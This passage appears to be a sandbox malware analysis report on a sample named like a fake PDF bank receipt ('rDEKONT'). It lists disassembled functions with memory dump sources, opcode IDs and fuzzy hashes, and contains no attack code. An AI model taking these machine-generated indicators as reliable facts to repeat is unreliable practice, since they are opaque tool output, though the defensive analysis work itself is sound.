                                                                                                                • Instruction Fuzzy Hash: 0C11E735B10216DFCB589EBE98146BF7AA6BFC4F21F05856DD806C7351EA708D4187E0
                                                                                                                Function 082719A8 Relevance: .1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a0140ba1ef39ff2314d65890c07d1be4b4413485798092029836a5cd8535d713
                                                                                                                • Instruction ID: a037d94abd124c8522f61836aa25f332d4c138a8767a4e1d697c6901de7f1cb2
                                                                                                                • Opcode Fuzzy Hash: a0140ba1ef39ff2314d65890c07d1be4b4413485798092029836a5cd8535d713
                                                                                                                • Instruction Fuzzy Hash: B2213970E1120ADFCB48CFAAD541AAEFBF1FF89300F20C56AD804A7254E7749A51DB51
                                                                                                                Function 082719B8 Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c9b0967120a3950062bd897802843f9c37c6175b67a654a0769bd291ef7cb528
                                                                                                                • Instruction ID: 3c7010589b6e861b12749fe84a6f30d5f4c5d10577cbda271a521f4295900e8d
                                                                                                                • Opcode Fuzzy Hash: c9b0967120a3950062bd897802843f9c37c6175b67a654a0769bd291ef7cb528
                                                                                                                • Instruction Fuzzy Hash: 762139B0D1420ADFCB48CFAAC541AAEFFF6BF89301F10D5AAC405A7254E7749A51CB91
                                                                                                                Function 013DD006 Relevance: .1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041871134.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13dd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b2d387f662fd65582d05f54e9074dd4e612e7d43f5c1062052c1d7e20338576a
                                                                                                                • Instruction ID: b4e93b6ac7e1294fcb109a2a0c50ee71ace61766806bf710f17cf7aca6935920
                                                                                                                • Opcode Fuzzy Hash: b2d387f662fd65582d05f54e9074dd4e612e7d43f5c1062052c1d7e20338576a
                                                                                                                • Instruction Fuzzy Hash: DE21A4765093808FDB13CF24D994715BF71EB85218F28C5DAD8498B697C33AD40ACB62
                                                                                                                Function 0827A1F7 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e393c1b32a28fe2ed1005d72165fd58d3af4c79652e43adc2ca56a3ef08ac25f
                                                                                                                • Instruction ID: fcf742a6339e748605a554d249ae00a0f1d1df72bda656ea4bfabd053a4518aa
                                                                                                                • Opcode Fuzzy Hash: e393c1b32a28fe2ed1005d72165fd58d3af4c79652e43adc2ca56a3ef08ac25f
                                                                                                                • Instruction Fuzzy Hash: 67113A70D19218DFCB44DFA9D0809EDBFF4FF49321B11929AC459AB212C3719A45CB40
                                                                                                                Function 0827A794 Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 18c908085f9fcab4e392dc3c36c096acc8b1d2e0c216afe5ffbe5581190edbbc
                                                                                                                • Instruction ID: 1a568511653c781e543f136baf5186f86d59297da04cdf1a4525145908b6836f
                                                                                                                • Opcode Fuzzy Hash: 18c908085f9fcab4e392dc3c36c096acc8b1d2e0c216afe5ffbe5581190edbbc
                                                                                                                • Instruction Fuzzy Hash: C3114C34929228CFDB18CF55D9849EDB3B9FB4A312F609599D40BAB341C3719D81CF10
                                                                                                                Function 013CD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041799744.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13cd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction ID: f2ffcc70b4e4c94f94507ee17fa93528331b2c5d8531092b7894fc48b748b9e9
                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction Fuzzy Hash: 0F11DF76404280CFCB02CF54D9C4B16BF71FB98718F24C6ADE9490B256C336D85ACBA2
                                                                                                                Function 013CD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041799744.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13cd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction ID: 552bb52206dd55e9d394dd3edebcf0aeac0606c10ebbaadf89f6abdb6c6c596c
                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction Fuzzy Hash: 4111CD72404240DFDB02CF44D9C4B56BF61FB84224F24C6ADEA090A256C33AE85ACBA2
                                                                                                                Function 08276EE8 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ec805cd7ce4f12ed7674594eeb73fff3c2df9b21f66e25434c9cee30be99c1f
                                                                                                                • Instruction ID: 9468ac724b69de6a7e88ab9c911b4a8feec10644c0a46c3675ddf57855c07eac
                                                                                                                • Opcode Fuzzy Hash: 0ec805cd7ce4f12ed7674594eeb73fff3c2df9b21f66e25434c9cee30be99c1f
                                                                                                                • Instruction Fuzzy Hash: AC1176B0E15209DFCB08CFAAD54029EBFF2EF98200F2485AAD41AE7240E6309E00CB45
                                                                                                                Function 08276FA9 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7742fd39d694921dae5b9dc61add347a8a5d6c4d8714757884241302faf7666
                                                                                                                • Instruction ID: 454043e15d5751398b7a7ea0516f9524cb1e26711c2a52675d89b674fff6bc4b
                                                                                                                • Opcode Fuzzy Hash: b7742fd39d694921dae5b9dc61add347a8a5d6c4d8714757884241302faf7666
                                                                                                                • Instruction Fuzzy Hash: A9116AB4E16609DFCB09CFAAD54469EBFF2AF89300F2485AAD405E3354D7348B41CB52
                                                                                                                Function 0827CFEA Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d679893ce7df03e3f858f2cf333d9026fb0d2950f20ee2c75549c755fff00b6
                                                                                                                • Instruction ID: 9af3dc95b3a1981f035af49ccd675a8f836b7cc0ce95e830b7d59edbfdbcacf8
                                                                                                                • Opcode Fuzzy Hash: 7d679893ce7df03e3f858f2cf333d9026fb0d2950f20ee2c75549c755fff00b6
                                                                                                                • Instruction Fuzzy Hash: 4121E934A15219CFCB14DF65EA48A9CBBB6FB88201F20856DD40A97316DE315D95CF50
                                                                                                                Function 013DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041871134.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13dd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                • Instruction ID: b3c011350aefb281e6bf39502d269d8eddc9a1d51421b2efc751c7ed6ef4707d
                                                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                • Instruction Fuzzy Hash: 9011BB76504280DFDB02CF54D5C4B15BFB1FB84228F24C6A9D8494B696C33AD40ACB62
                                                                                                                Function 08276EF8 Relevance: .0, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1d0bdc3a83a618c1acdd68cc556adc419e93d808573a4a2fb52b66b87263463c
                                                                                                                • Instruction ID: 561529f6b10c6341263e7414fdcb6b0c2d0a7a820da427ffeae71b55da5d2bfc
                                                                                                                • Opcode Fuzzy Hash: 1d0bdc3a83a618c1acdd68cc556adc419e93d808573a4a2fb52b66b87263463c
                                                                                                                • Instruction Fuzzy Hash: 2B1148B0E15609DFCB08CFAAD54029EBFF6FB98201F20C5AAD41AE7244E7309A00CB41
                                                                                                                Function 08276FB8 Relevance: .0, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d8cf9f8aa5c15012c6887149606269c783e399c3c28d2885abed10465eff3a2
                                                                                                                • Instruction ID: cbfceb9be99a69922b253dbd5779908872eed650fa9adc930a681c942f4049c4
                                                                                                                • Opcode Fuzzy Hash: 7d8cf9f8aa5c15012c6887149606269c783e399c3c28d2885abed10465eff3a2
                                                                                                                • Instruction Fuzzy Hash: D1115EB4E25609DFCB48CFAAD54459EBFF2AF88301F20C56AD405E3344D7709A41CB51
                                                                                                                Function 0827A208 Relevance: .0, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ebe575f2e03c22e378a3d2d49d2219c086723403a585c122e4ea275998b88ee
                                                                                                                • Instruction ID: 42286f264657884241f62b5d62d7baca77c5c74b75c279655106223e91d8326a
                                                                                                                • Opcode Fuzzy Hash: 7ebe575f2e03c22e378a3d2d49d2219c086723403a585c122e4ea275998b88ee
                                                                                                                • Instruction Fuzzy Hash: 1A113C70D18118DFCB48DF9AD5809AEBBF9FF49321F11D59AD419A7311D3719A40CB40
                                                                                                                Function 0827B558 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9204e9d7d7bfb5cbfe48086c1e3d4b2015995d0778d35ffb8b2cbacc09e01512
                                                                                                                • Instruction ID: 0b15bb38a41393327f84b1448ef1ac0267e787565a669e1d0d4500f233187663
                                                                                                                • Opcode Fuzzy Hash: 9204e9d7d7bfb5cbfe48086c1e3d4b2015995d0778d35ffb8b2cbacc09e01512
                                                                                                                • Instruction Fuzzy Hash: 1601847096D284EFCB09CF66D5409EDFFB8EF5A322B1492A9D0059B212D3708B45DB90
                                                                                                                Function 0827B5D0 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c9a2a81227e96428354daf6fcb47ef41c480cca86c6769f5924316562ec821a0
                                                                                                                • Instruction ID: 60234bd501452c5dc8c3bca714d1a734bd0bbb22c75c6abfd2669d3fa8e585d6
                                                                                                                • Opcode Fuzzy Hash: c9a2a81227e96428354daf6fcb47ef41c480cca86c6769f5924316562ec821a0
                                                                                                                • Instruction Fuzzy Hash: 59018C34A19104DFC704DFA9C688AA8BBF5EB09311F15C1E9D8088B362C630CE42DB40
                                                                                                                Function 0827A6F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b98b864153f461e11716d693849fcc129abd362169318ff84367f74d556aeb6e
                                                                                                                • Instruction ID: 033dff709fb0bc5391766c0149d2e86c9abbaf684024cad3b3f081eb3c7de21c
                                                                                                                • Opcode Fuzzy Hash: b98b864153f461e11716d693849fcc129abd362169318ff84367f74d556aeb6e
                                                                                                                • Instruction Fuzzy Hash: 4911FAB1D15619CBEB1CCF5BD8046EEFAF7AFC9301F14C17AD40966255DB700A468E90
                                                                                                                Function 08275168 Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 491a9771f06877a3123cd8e5280c456fe1bd9be3d64f49a98dcb9f7acf08e99c
                                                                                                                • Instruction ID: be2b6a80b5350f1eb20b0db65b381898b538836fb0f34e07d10be2e054dab03f
                                                                                                                • Opcode Fuzzy Hash: 491a9771f06877a3123cd8e5280c456fe1bd9be3d64f49a98dcb9f7acf08e99c
                                                                                                                • Instruction Fuzzy Hash: C7112AB4E1520ADFCB48CFA9D64169EFFF2EF88301F20816AD804A3304E7704A519B85
                                                                                                                Function 08275178 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 970957ca7d9b93beb262c7be97df3a86020fa0b4eee0c7a54199624731e35164
                                                                                                                • Instruction ID: 64f5f4ed2b2d5476a9598903e3b4cefb1e285f13dc02267f24e7829c5f0bfb4e
                                                                                                                • Opcode Fuzzy Hash: 970957ca7d9b93beb262c7be97df3a86020fa0b4eee0c7a54199624731e35164
                                                                                                                • Instruction Fuzzy Hash: D3111E74E15209DFCB48CFEAD6815AEFFF2EB88301F10816AD408E3344E7705A459B95
                                                                                                                Function 0827D038 Relevance: .0, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16415671a38682c3b1b41e0ef654b85520cfa4a8d340bd6379d8225b97902976
                                                                                                                • Instruction ID: 2cda68fdf2362ab89eba6dfcff3a937f760a8ed2f45c9542de56eb2e47d8a505
                                                                                                                • Opcode Fuzzy Hash: 16415671a38682c3b1b41e0ef654b85520cfa4a8d340bd6379d8225b97902976
                                                                                                                • Instruction Fuzzy Hash: 0F114874A1021A8FCB14DF65E948BA8B7B6FF88201F1081AAD40DA7355DA314DD1CF60
                                                                                                                Function 08275AB0 Relevance: .0, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 383be87b9057a8ae6381dd4d6316f00875f9ada0089cab7a310d1397fe6feebd
                                                                                                                • Instruction ID: 3a2a939f383957c26f786ec6befa89a22940b982072f520e06e57af2a9e2a48a
                                                                                                                • Opcode Fuzzy Hash: 383be87b9057a8ae6381dd4d6316f00875f9ada0089cab7a310d1397fe6feebd
                                                                                                                • Instruction Fuzzy Hash: 8F015670E1A3899FCB56DFB9C9042AEFFB1AF0A310F0481ABD444E3282E6750A04CB55
                                                                                                                Function 0827AC55 Relevance: .0, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59d7359940ac83737045243b2281db2b43d838ade3807577764b197092e7e265
                                                                                                                • Instruction ID: 671d0afb435613cd2f59bf5aee06e846e1c2a330e691dce9ec6564efc828eadb
                                                                                                                • Opcode Fuzzy Hash: 59d7359940ac83737045243b2281db2b43d838ade3807577764b197092e7e265
                                                                                                                • Instruction Fuzzy Hash: F0113934926124DFDB50DF18D984B9CBBB9FF48311F0191EAD84AA7212C330AE81CF00
                                                                                                                Function 082770BB Relevance: .0, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67220feecd0a608c94842edf13021c09f14383969c55ee9721362347d70f7b51
                                                                                                                • Instruction ID: ef2eaecf7370938cf24b0694358dd8fba5cc0b354f72058c7bf47889dd8e11eb
                                                                                                                • Opcode Fuzzy Hash: 67220feecd0a608c94842edf13021c09f14383969c55ee9721362347d70f7b51
                                                                                                                • Instruction Fuzzy Hash: 44014F74E25209DFCB48CFA9D94529DBFF2EB89311F28D5AAD404A3754EB308E449B44
                                                                                                                Function 082770C0 Relevance: .0, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bbaa659765863e3502d08640e3d775b3d0fdb9ec73e66fe133eb5935daf644bc
                                                                                                                • Instruction ID: baedf307307c288ffa47e21fd0dd23ea108c3147f45a40d9ab90bfeea992db15
                                                                                                                • Opcode Fuzzy Hash: bbaa659765863e3502d08640e3d775b3d0fdb9ec73e66fe133eb5935daf644bc
                                                                                                                • Instruction Fuzzy Hash: BA01A434E25208DFCB48CFAAD54525DBFF6EB85301F14D1AAC004A3354E7308E448B44
                                                                                                                Function 0827B568 Relevance: .0, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d73d759d6077f3e1f460466110876a6c42b64729d4fbd5e074701ef471801b2
                                                                                                                • Instruction ID: 820f444471fb6e63b4ee3b92b7b6d38a8dd0efad88d3d3f34496864457a022e2
                                                                                                                • Opcode Fuzzy Hash: 5d73d759d6077f3e1f460466110876a6c42b64729d4fbd5e074701ef471801b2
                                                                                                                • Instruction Fuzzy Hash: 9FF0AF70928188DFCB08CF5AD5409BDBBBCEF9A322F14D1A8D0095B216D7708A44DB80
                                                                                                                Function 08275F21 Relevance: .0, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1fc403b244c8d0c5f7326b091991b506f4cadfb0022dda10f9f85e41ad0d6b5d
                                                                                                                • Instruction ID: 3446f7290599470fc1d15e19b68d847b7667f8e1a768782be14fc9468834a745
                                                                                                                • Opcode Fuzzy Hash: 1fc403b244c8d0c5f7326b091991b506f4cadfb0022dda10f9f85e41ad0d6b5d
                                                                                                                • Instruction Fuzzy Hash: 9AF0F677B1010DABDF00DA95DD019AEFB76EF95325F248299E818973A0E6329821DB41
                                                                                                                Function 0827A959 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6ebd96e1969d84b77e964328dc72ab28d46a4966ca50d74a0e4ba9413e2b569
                                                                                                                • Instruction ID: 493f2d5516c0bc643cfc2a658fda4b9565eb83dc7aa4140dcbd62d5321da4bfd
                                                                                                                • Opcode Fuzzy Hash: a6ebd96e1969d84b77e964328dc72ab28d46a4966ca50d74a0e4ba9413e2b569
                                                                                                                • Instruction Fuzzy Hash: 96011930929228CFDB18CB51D5849ACB77BFB4A312F10D599D40B6B256C771E992CF14
                                                                                                                Function 0827E83F Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92f262c82d65e6f3953dd5bdba023ed67ca1ed5659b53f1a0c9c28f4b489797a
                                                                                                                • Instruction ID: 1164d7a38a9bb8179bba1751a5d6ae1e1e0e8c80fa29ceff4ff456a301e088df
                                                                                                                • Opcode Fuzzy Hash: 92f262c82d65e6f3953dd5bdba023ed67ca1ed5659b53f1a0c9c28f4b489797a
                                                                                                                • Instruction Fuzzy Hash: 39F06D34905208AFCB12DFA8D4046CDBFB1AF48211F51C1AED844A7351C2354A95DF91
                                                                                                                Function 08271D80 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d122a5b4267b25e9ef654c2a5a01be33fcf40de7c7abaefe8bcde32943fa31c5
